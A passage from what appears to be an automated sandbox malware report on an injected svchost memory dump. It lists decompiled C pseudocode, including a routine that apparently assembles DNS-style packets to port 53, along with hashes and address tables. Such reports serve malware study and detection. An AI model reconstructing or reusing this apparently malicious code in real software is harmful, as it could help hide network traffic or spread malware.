                                                                                                                                                                                                                                                                      0x040094c4

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                                                                      • String ID: ,SB
                                                                                                                                                                                                                                                                      • API String ID: 1628550938-3344058557
                                                                                                                                                                                                                                                                      • Opcode ID: 3d3124fdb95e4bcea8cf975f9c6f5d5c3062870727a51910439b4630ff52904f
                                                                                                                                                                                                                                                                      • Instruction ID: 993150cf3f8eb55d910a7a38cf2a2ebf2ab550eb7e4aba8557308306761a1f3f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d3124fdb95e4bcea8cf975f9c6f5d5c3062870727a51910439b4630ff52904f
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F1193B1904B019EF720EF759801B99BBE0AF00318F50C51AD599A72D1C774A641CB59
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                                                                                                                                      			E0401A890(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                      				short* _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				short* _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				short* _v28;
                                                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                                                                                                      				char _v292;
                                                                                                                                                                                                                                                                      				intOrPtr _v296;
                                                                                                                                                                                                                                                                      				char _v300;
                                                                                                                                                                                                                                                                      				intOrPtr _v304;
                                                                                                                                                                                                                                                                      				intOrPtr _v308;
                                                                                                                                                                                                                                                                      				intOrPtr _v312;
                                                                                                                                                                                                                                                                      				intOrPtr _v316;
                                                                                                                                                                                                                                                                      				intOrPtr _v320;
                                                                                                                                                                                                                                                                      				intOrPtr _t138;
                                                                                                                                                                                                                                                                      				void* _t177;
                                                                                                                                                                                                                                                                      				signed char _t187;
                                                                                                                                                                                                                                                                      				signed char _t192;
                                                                                                                                                                                                                                                                      				void* _t195;
                                                                                                                                                                                                                                                                      				void* _t253;
                                                                                                                                                                                                                                                                      				void* _t254;
                                                                                                                                                                                                                                                                      				signed int _t255;
                                                                                                                                                                                                                                                                      				void* _t256;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t254 = __esi;
                                                                                                                                                                                                                                                                      				_t253 = __edi;
                                                                                                                                                                                                                                                                      				_t195 = __ebx;
                                                                                                                                                                                                                                                                      				_v36 =  *0x429024 ^ _t255;
                                                                                                                                                                                                                                                                      				_v320 = __ecx;
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                                                                                                      				while(_a4 != 0 && _a12 != 0 && _a16 >= 1 && _a16 <= 3) {
                                                                                                                                                                                                                                                                      					_t138 = E040070A0(_a4);
                                                                                                                                                                                                                                                                      					_t256 = _t256 + 4;
                                                                                                                                                                                                                                                                      					_v296 = _t138;
                                                                                                                                                                                                                                                                      					if(_v296 >= 1) {
                                                                                                                                                                                                                                                                      						E04007010(_t253,  &_v292, 0, 0xff);
                                                                                                                                                                                                                                                                      						_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                      						_t228 =  &_v292;
                                                                                                                                                                                                                                                                      						_v20 = E04019850(_v320, _a4, _v296,  &_v292, 0xff);
                                                                                                                                                                                                                                                                      						if(_v20 >= 1) {
                                                                                                                                                                                                                                                                      							_v300 = 0;
                                                                                                                                                                                                                                                                      							if(_a16 != 1) {
                                                                                                                                                                                                                                                                      								if(_a16 != 2) {
                                                                                                                                                                                                                                                                      									if(_a16 != 3) {
                                                                                                                                                                                                                                                                      										goto L22;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										_v304 =  *0x425260(_a12);
                                                                                                                                                                                                                                                                      										if(_v304 != 0) {
                                                                                                                                                                                                                                                                      											_v300 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v304 + 0xc))))));
                                                                                                                                                                                                                                                                      											_t187 = E0401BA40(4, _a12,  &_v300);
                                                                                                                                                                                                                                                                      											_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                      											if((_t187 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                      												E0401C2A0(_t253, 4, _a12,  &_v300);
                                                                                                                                                                                                                                                                      												_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											goto L22;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_v300 =  *0x425258(_a12);
                                                                                                                                                                                                                                                                      									_t192 = E0401BA40(4, _a12,  &_v300);
                                                                                                                                                                                                                                                                      									_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                      									if((_t192 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                      										E0401C2A0(_t253, 4, _a12,  &_v300);
                                                                                                                                                                                                                                                                      										_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									goto L22;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v300 = _a12;
                                                                                                                                                                                                                                                                      								L22:
                                                                                                                                                                                                                                                                      								_v308 = E04020CE0(0x1000);
                                                                                                                                                                                                                                                                      								_v32 = _v308;
                                                                                                                                                                                                                                                                      								E04007010(_t253, _v32, 0, 0x1000);
                                                                                                                                                                                                                                                                      								_v16 = 0;
                                                                                                                                                                                                                                                                      								_v28 = 0;
                                                                                                                                                                                                                                                                      								_v16 = _v32;
                                                                                                                                                                                                                                                                      								 *_v16 =  *0x4250b4();
                                                                                                                                                                                                                                                                      								 *(_v16 + 2) =  *(_v16 + 2) & 0x0000007f;
                                                                                                                                                                                                                                                                      								 *(_v16 + 2) =  *(_v16 + 2) & 0x00000087;
                                                                                                                                                                                                                                                                      								 *(_v16 + 2) =  *(_v16 + 2) & 0x000000fb;
                                                                                                                                                                                                                                                                      								 *(_v16 + 2) =  *(_v16 + 2) & 0x000000fd;
                                                                                                                                                                                                                                                                      								 *(_v16 + 2) =  *(_v16 + 2) | 0x00000001;
                                                                                                                                                                                                                                                                      								 *(_v16 + 3) =  *(_v16 + 3) & 0x0000007f;
                                                                                                                                                                                                                                                                      								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000bf;
                                                                                                                                                                                                                                                                      								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000df;
                                                                                                                                                                                                                                                                      								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000ef;
                                                                                                                                                                                                                                                                      								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000f0;
                                                                                                                                                                                                                                                                      								 *((short*)(_v16 + 4)) =  *0x425278(1);
                                                                                                                                                                                                                                                                      								 *((short*)(_v16 + 6)) = 0;
                                                                                                                                                                                                                                                                      								 *((short*)(_v16 + 8)) = 0;
                                                                                                                                                                                                                                                                      								 *((short*)(_v16 + 0xa)) = 0;
                                                                                                                                                                                                                                                                      								E04006CA0(_t195, _t253, _t254, _v32 + 0xc,  &_v292);
                                                                                                                                                                                                                                                                      								_v28 = _v32 + E04008A9C( &_v292, 0xfe) + 0xd;
                                                                                                                                                                                                                                                                      								 *_v28 =  *0x425278(_a8 & 0x0000ffff, _v20);
                                                                                                                                                                                                                                                                      								 *((short*)(_v28 + 2)) =  *0x425278(1);
                                                                                                                                                                                                                                                                      								_t177 = E04008A9C( &_v292, 0xfe);
                                                                                                                                                                                                                                                                      								_t256 = _t256 + 0x2c;
                                                                                                                                                                                                                                                                      								_v24 = _t177 + 0x11;
                                                                                                                                                                                                                                                                      								_t228 = _v32;
                                                                                                                                                                                                                                                                      								_v8 = E0401D100(_t195,  *((intOrPtr*)(_v320 + 0x10)), _t253, _t254, _v300, 0x35, _v32, _v24);
                                                                                                                                                                                                                                                                      								if(_v32 != 0) {
                                                                                                                                                                                                                                                                      									_t228 = _v32;
                                                                                                                                                                                                                                                                      									_v312 = _v32;
                                                                                                                                                                                                                                                                      									E04020CC0(_v312);
                                                                                                                                                                                                                                                                      									_t256 = _t256 + 4;
                                                                                                                                                                                                                                                                      									_v32 = 0;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								if(0 != 0) {
                                                                                                                                                                                                                                                                      									continue;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L25:
                                                                                                                                                                                                                                                                      					if(_v8 == 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                      						_t228 = _v12;
                                                                                                                                                                                                                                                                      						_v316 = _v12;
                                                                                                                                                                                                                                                                      						E04020CC0(_v316);
                                                                                                                                                                                                                                                                      						_v12 = 0;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					return E04006C8C(_v8, _t195, _v36 ^ _t255, _t228, _t253, _t254);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L25;
                                                                                                                                                                                                                                                                      			}




























                                                                                                                                                                                                                                                                      0x0401a890
                                                                                                                                                                                                                                                                      0x0401a890
                                                                                                                                                                                                                                                                      0x0401a890
                                                                                                                                                                                                                                                                      0x0401a8a0
                                                                                                                                                                                                                                                                      0x0401a8a3
                                                                                                                                                                                                                                                                      0x0401a8a9
                                                                                                                                                                                                                                                                      0x0401a8b0
                                                                                                                                                                                                                                                                      0x0401a8b7
                                                                                                                                                                                                                                                                      0x0401a8d8
                                                                                                                                                                                                                                                                      0x0401a8dd
                                                                                                                                                                                                                                                                      0x0401a8e0
                                                                                                                                                                                                                                                                      0x0401a8ed
                                                                                                                                                                                                                                                                      0x0401a902
                                                                                                                                                                                                                                                                      0x0401a907
                                                                                                                                                                                                                                                                      0x0401a90f
                                                                                                                                                                                                                                                                      0x0401a92c
                                                                                                                                                                                                                                                                      0x0401a933
                                                                                                                                                                                                                                                                      0x0401a93a
                                                                                                                                                                                                                                                                      0x0401a948
                                                                                                                                                                                                                                                                      0x0401a95c
                                                                                                                                                                                                                                                                      0x0401a9a5
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401a9a7
                                                                                                                                                                                                                                                                      0x0401a9b1
                                                                                                                                                                                                                                                                      0x0401a9be
                                                                                                                                                                                                                                                                      0x0401a9cd
                                                                                                                                                                                                                                                                      0x0401a9e0
                                                                                                                                                                                                                                                                      0x0401a9e5
                                                                                                                                                                                                                                                                      0x0401a9ed
                                                                                                                                                                                                                                                                      0x0401a9fc
                                                                                                                                                                                                                                                                      0x0401aa01
                                                                                                                                                                                                                                                                      0x0401aa01
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401aa04
                                                                                                                                                                                                                                                                      0x0401a9be
                                                                                                                                                                                                                                                                      0x0401a95e
                                                                                                                                                                                                                                                                      0x0401a968
                                                                                                                                                                                                                                                                      0x0401a97b
                                                                                                                                                                                                                                                                      0x0401a980
                                                                                                                                                                                                                                                                      0x0401a988
                                                                                                                                                                                                                                                                      0x0401a997
                                                                                                                                                                                                                                                                      0x0401a99c
                                                                                                                                                                                                                                                                      0x0401a99c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401a99f
                                                                                                                                                                                                                                                                      0x0401a94a
                                                                                                                                                                                                                                                                      0x0401a94d
                                                                                                                                                                                                                                                                      0x0401aa0b
                                                                                                                                                                                                                                                                      0x0401aa18
                                                                                                                                                                                                                                                                      0x0401aa24
                                                                                                                                                                                                                                                                      0x0401aa32
                                                                                                                                                                                                                                                                      0x0401aa3a
                                                                                                                                                                                                                                                                      0x0401aa41
                                                                                                                                                                                                                                                                      0x0401aa4b
                                                                                                                                                                                                                                                                      0x0401aa57
                                                                                                                                                                                                                                                                      0x0401aa65
                                                                                                                                                                                                                                                                      0x0401aa73
                                                                                                                                                                                                                                                                      0x0401aa81
                                                                                                                                                                                                                                                                      0x0401aa8f
                                                                                                                                                                                                                                                                      0x0401aa9d
                                                                                                                                                                                                                                                                      0x0401aaab
                                                                                                                                                                                                                                                                      0x0401aab9
                                                                                                                                                                                                                                                                      0x0401aac7
                                                                                                                                                                                                                                                                      0x0401aad5
                                                                                                                                                                                                                                                                      0x0401aae3
                                                                                                                                                                                                                                                                      0x0401aaf1
                                                                                                                                                                                                                                                                      0x0401aafa
                                                                                                                                                                                                                                                                      0x0401ab03
                                                                                                                                                                                                                                                                      0x0401ab0c
                                                                                                                                                                                                                                                                      0x0401ab22
                                                                                                                                                                                                                                                                      0x0401ab45
                                                                                                                                                                                                                                                                      0x0401ab56
                                                                                                                                                                                                                                                                      0x0401ab64
                                                                                                                                                                                                                                                                      0x0401ab74
                                                                                                                                                                                                                                                                      0x0401ab79
                                                                                                                                                                                                                                                                      0x0401ab7f
                                                                                                                                                                                                                                                                      0x0401ab86
                                                                                                                                                                                                                                                                      0x0401aba1
                                                                                                                                                                                                                                                                      0x0401aba8
                                                                                                                                                                                                                                                                      0x0401abaa
                                                                                                                                                                                                                                                                      0x0401abad
                                                                                                                                                                                                                                                                      0x0401abba
                                                                                                                                                                                                                                                                      0x0401abbf
                                                                                                                                                                                                                                                                      0x0401abc2
                                                                                                                                                                                                                                                                      0x0401abc2
                                                                                                                                                                                                                                                                      0x0401abcb
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401abcb
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401a935
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401a8ef
                                                                                                                                                                                                                                                                      0x0401abd1
                                                                                                                                                                                                                                                                      0x0401abd5
                                                                                                                                                                                                                                                                      0x0401abdd
                                                                                                                                                                                                                                                                      0x0401abe0
                                                                                                                                                                                                                                                                      0x0401abed
                                                                                                                                                                                                                                                                      0x0401abf5
                                                                                                                                                                                                                                                                      0x0401abf5
                                                                                                                                                                                                                                                                      0x0401ac0c
                                                                                                                                                                                                                                                                      0x0401ac0c
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _memset_strnlen$_strlen
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1397555153-0
                                                                                                                                                                                                                                                                      • Opcode ID: 245b28424be2591b61ab36919849ca7590a44cec909f559def13932347f90032
                                                                                                                                                                                                                                                                      • Instruction ID: 9948d87256a1ab2e7e4c421ed80cf7a845357aae833f097959cef4c1dbbed60e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 245b28424be2591b61ab36919849ca7590a44cec909f559def13932347f90032
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FB17B75E012499FDB14CF90C881BEEF7B1EF48308F14C19AE8596B391D634AA86CF91
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                                                                                                                                      			E04012D20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                                                                                                      				signed int _v80;
                                                                                                                                                                                                                                                                      				intOrPtr _t115;
                                                                                                                                                                                                                                                                      				intOrPtr _t120;
                                                                                                                                                                                                                                                                      				intOrPtr _t130;
                                                                                                                                                                                                                                                                      				void* _t148;
                                                                                                                                                                                                                                                                      				void* _t151;
                                                                                                                                                                                                                                                                      				void* _t203;
                                                                                                                                                                                                                                                                      				void* _t204;
                                                                                                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                                                                                                      				void* _t206;
                                                                                                                                                                                                                                                                      				void* _t207;
                                                                                                                                                                                                                                                                      				void* _t209;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t204 = __esi;
                                                                                                                                                                                                                                                                      				_t203 = __edi;
                                                                                                                                                                                                                                                                      				_t151 = __ebx;
                                                                                                                                                                                                                                                                      				_v76 = __ecx;
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				while(_a4 != 0) {
                                                                                                                                                                                                                                                                      					_t115 = E040070A0( *((intOrPtr*)(_a4 + 4)));
                                                                                                                                                                                                                                                                      					_t206 = _t205 + 4;
                                                                                                                                                                                                                                                                      					_v12 = _t115;
                                                                                                                                                                                                                                                                      					if(_v12 >= 1) {
                                                                                                                                                                                                                                                                      						_v16 = 0xffffffff;
                                                                                                                                                                                                                                                                      						_v28 = 0;
                                                                                                                                                                                                                                                                      						while(_v28 < _v12) {
                                                                                                                                                                                                                                                                      							if( *((char*)( *((intOrPtr*)(_a4 + 4)) + _v28)) != 0x3a) {
                                                                                                                                                                                                                                                                      								_v28 = _v28 + 1;
                                                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v16 = _v28;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						if(_v16 >= 0) {
                                                                                                                                                                                                                                                                      							_v20 = 0;
                                                                                                                                                                                                                                                                      							_t29 =  *((intOrPtr*)(_a4 + 4)) + 1; // 0x1
                                                                                                                                                                                                                                                                      							_t120 = E0401EBC0(_t151, _t203, _t204, _v16 + _t29, _v12 - _v16 + 1, 0x426f4c,  &_v20);
                                                                                                                                                                                                                                                                      							_t205 = _t206 + 0x10;
                                                                                                                                                                                                                                                                      							_v24 = _t120;
                                                                                                                                                                                                                                                                      							if(_v24 > 0 && _v20 != 0) {
                                                                                                                                                                                                                                                                      								E040228B0(_t151, _t203, _t204, _v20, 4, _v24);
                                                                                                                                                                                                                                                                      								_t207 = _t205 + 0xc;
                                                                                                                                                                                                                                                                      								_v40 = _v24 - 1;
                                                                                                                                                                                                                                                                      								_v44 = 0;
                                                                                                                                                                                                                                                                      								while(_v44 < _v24) {
                                                                                                                                                                                                                                                                      									_t148 = E040070A0( *((intOrPtr*)(_v20 + _v44 * 4)));
                                                                                                                                                                                                                                                                      									_t207 = _t207 + 4;
                                                                                                                                                                                                                                                                      									_v40 = _t148 + _v40;
                                                                                                                                                                                                                                                                      									_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_v60 = E04020CE0(_v40 + 1);
                                                                                                                                                                                                                                                                      								_v32 = _v60;
                                                                                                                                                                                                                                                                      								E04007010(_t203, _v32, 0, _v40 + 1);
                                                                                                                                                                                                                                                                      								_t209 = _t207 + 0x10;
                                                                                                                                                                                                                                                                      								_v36 = 0;
                                                                                                                                                                                                                                                                      								_v48 = 0;
                                                                                                                                                                                                                                                                      								while(_v48 < _v24) {
                                                                                                                                                                                                                                                                      									_v52 = E040070A0( *((intOrPtr*)(_v20 + _v48 * 4)));
                                                                                                                                                                                                                                                                      									_push(_v52);
                                                                                                                                                                                                                                                                      									E04006CA0(_t151, _t203, _t204, _v32 + _v36,  *((intOrPtr*)(_v20 + _v48 * 4)));
                                                                                                                                                                                                                                                                      									_t209 = _t209 + 0x10;
                                                                                                                                                                                                                                                                      									_v36 = _v36 + _v52;
                                                                                                                                                                                                                                                                      									 *((char*)(_v32 + _v36)) = 0x20;
                                                                                                                                                                                                                                                                      									_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                      									_v48 = _v48 + 1;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t130 = E04020CE0(8);
                                                                                                                                                                                                                                                                      								_t205 = _t209 + 4;
                                                                                                                                                                                                                                                                      								_v64 = _t130;
                                                                                                                                                                                                                                                                      								if(_v64 == 0) {
                                                                                                                                                                                                                                                                      									_v80 = 0;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_v80 = E0401F4E0(_v64);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_v8 = _v80;
                                                                                                                                                                                                                                                                      								E0401FC90(_t151, _v8, _t203, _t204, _v32, _v40);
                                                                                                                                                                                                                                                                      								_v56 = 0;
                                                                                                                                                                                                                                                                      								while(_v56 < _v24) {
                                                                                                                                                                                                                                                                      									if( *((intOrPtr*)(_v20 + _v56 * 4)) != 0) {
                                                                                                                                                                                                                                                                      										_v68 =  *((intOrPtr*)(_v20 + _v56 * 4));
                                                                                                                                                                                                                                                                      										E04020CC0(_v68);
                                                                                                                                                                                                                                                                      										_t205 = _t205 + 4;
                                                                                                                                                                                                                                                                      										 *((intOrPtr*)(_v20 + _v56 * 4)) = 0x666;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								if(_v20 != 0) {
                                                                                                                                                                                                                                                                      									_v72 = _v20;
                                                                                                                                                                                                                                                                      									E04020CC0(_v72);
                                                                                                                                                                                                                                                                      									_t205 = _t205 + 4;
                                                                                                                                                                                                                                                                      									_v20 = 0x666;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							if(0 != 0) {
                                                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L35:
                                                                                                                                                                                                                                                                      					return _v8;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L35;
                                                                                                                                                                                                                                                                      			}

































                                                                                                                                                                                                                                                                      0x04012d20
                                                                                                                                                                                                                                                                      0x04012d20
                                                                                                                                                                                                                                                                      0x04012d20
                                                                                                                                                                                                                                                                      0x04012d26
                                                                                                                                                                                                                                                                      0x04012d29
                                                                                                                                                                                                                                                                      0x04012d30
                                                                                                                                                                                                                                                                      0x04012d42
                                                                                                                                                                                                                                                                      0x04012d47
                                                                                                                                                                                                                                                                      0x04012d4a
                                                                                                                                                                                                                                                                      0x04012d51
                                                                                                                                                                                                                                                                      0x04012d58
                                                                                                                                                                                                                                                                      0x04012d5f
                                                                                                                                                                                                                                                                      0x04012d71
                                                                                                                                                                                                                                                                      0x04012d89
                                                                                                                                                                                                                                                                      0x04012d6e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04012d8b
                                                                                                                                                                                                                                                                      0x04012d8e
                                                                                                                                                                                                                                                                      0x04012d8e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04012d89
                                                                                                                                                                                                                                                                      0x04012d99
                                                                                                                                                                                                                                                                      0x04012da0
                                                                                                                                                                                                                                                                      0x04012dc5
                                                                                                                                                                                                                                                                      0x04012dca
                                                                                                                                                                                                                                                                      0x04012dcf
                                                                                                                                                                                                                                                                      0x04012dd2
                                                                                                                                                                                                                                                                      0x04012dd9
                                                                                                                                                                                                                                                                      0x04012df3
                                                                                                                                                                                                                                                                      0x04012df8
                                                                                                                                                                                                                                                                      0x04012e01
                                                                                                                                                                                                                                                                      0x04012e04
                                                                                                                                                                                                                                                                      0x04012e16
                                                                                                                                                                                                                                                                      0x04012e28
                                                                                                                                                                                                                                                                      0x04012e2d
                                                                                                                                                                                                                                                                      0x04012e33
                                                                                                                                                                                                                                                                      0x04012e13
                                                                                                                                                                                                                                                                      0x04012e13
                                                                                                                                                                                                                                                                      0x04012e47
                                                                                                                                                                                                                                                                      0x04012e4d
                                                                                                                                                                                                                                                                      0x04012e5d
                                                                                                                                                                                                                                                                      0x04012e62
                                                                                                                                                                                                                                                                      0x04012e65
                                                                                                                                                                                                                                                                      0x04012e6c
                                                                                                                                                                                                                                                                      0x04012e7e
                                                                                                                                                                                                                                                                      0x04012e98
                                                                                                                                                                                                                                                                      0x04012e9e
                                                                                                                                                                                                                                                                      0x04012eb0
                                                                                                                                                                                                                                                                      0x04012eb5
                                                                                                                                                                                                                                                                      0x04012ebe
                                                                                                                                                                                                                                                                      0x04012ec7
                                                                                                                                                                                                                                                                      0x04012ed0
                                                                                                                                                                                                                                                                      0x04012e7b
                                                                                                                                                                                                                                                                      0x04012e7b
                                                                                                                                                                                                                                                                      0x04012ed7
                                                                                                                                                                                                                                                                      0x04012edc
                                                                                                                                                                                                                                                                      0x04012edf
                                                                                                                                                                                                                                                                      0x04012ee6
                                                                                                                                                                                                                                                                      0x04012ef5
                                                                                                                                                                                                                                                                      0x04012ee8
                                                                                                                                                                                                                                                                      0x04012ef0
                                                                                                                                                                                                                                                                      0x04012ef0
                                                                                                                                                                                                                                                                      0x04012eff
                                                                                                                                                                                                                                                                      0x04012f0d
                                                                                                                                                                                                                                                                      0x04012f12
                                                                                                                                                                                                                                                                      0x04012f24
                                                                                                                                                                                                                                                                      0x04012f36
                                                                                                                                                                                                                                                                      0x04012f41
                                                                                                                                                                                                                                                                      0x04012f48
                                                                                                                                                                                                                                                                      0x04012f4d
                                                                                                                                                                                                                                                                      0x04012f56
                                                                                                                                                                                                                                                                      0x04012f56
                                                                                                                                                                                                                                                                      0x04012f21
                                                                                                                                                                                                                                                                      0x04012f21
                                                                                                                                                                                                                                                                      0x04012f63
                                                                                                                                                                                                                                                                      0x04012f68
                                                                                                                                                                                                                                                                      0x04012f6f
                                                                                                                                                                                                                                                                      0x04012f74
                                                                                                                                                                                                                                                                      0x04012f77
                                                                                                                                                                                                                                                                      0x04012f77
                                                                                                                                                                                                                                                                      0x04012f63
                                                                                                                                                                                                                                                                      0x04012f80
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04012d9b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04012d53
                                                                                                                                                                                                                                                                      0x04012f86
                                                                                                                                                                                                                                                                      0x04012f8c
                                                                                                                                                                                                                                                                      0x04012f8c
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                                                                                                                                      • Opcode ID: 589d3e65630ef34cec759d841c4f9ee093c734cc23f38093e9c684df022fd702
